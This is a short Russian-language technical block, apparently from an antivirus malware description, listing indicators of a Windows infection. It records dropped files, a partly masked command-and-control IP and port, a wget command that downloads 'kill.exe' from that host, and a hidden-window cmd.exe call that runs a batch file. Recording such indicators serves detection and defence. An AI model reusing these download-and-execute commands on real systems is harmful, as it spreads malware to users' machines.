Техническая информация
- %WINDIR%\wget.exe
- %WINDIR%\client.exe
- %TEMP%\~2d27.bat
- %TEMP%\~2d27.bat
- %TEMP%\~2d27.bat
- '21#.#5.31.162':3288
- ClassName: 'EDIT' WindowName: ''
- '%WINDIR%\client.exe'
- '%WINDIR%\wget.exe' -t 2 http://21#.#5.31.162:3288/YQ/hexing/kill.exe
- '%WINDIR%\syswow64\cmd.exe' /c %TEMP%\~2D27.bat "%WINDIR%\client.exe" (со скрытым окном)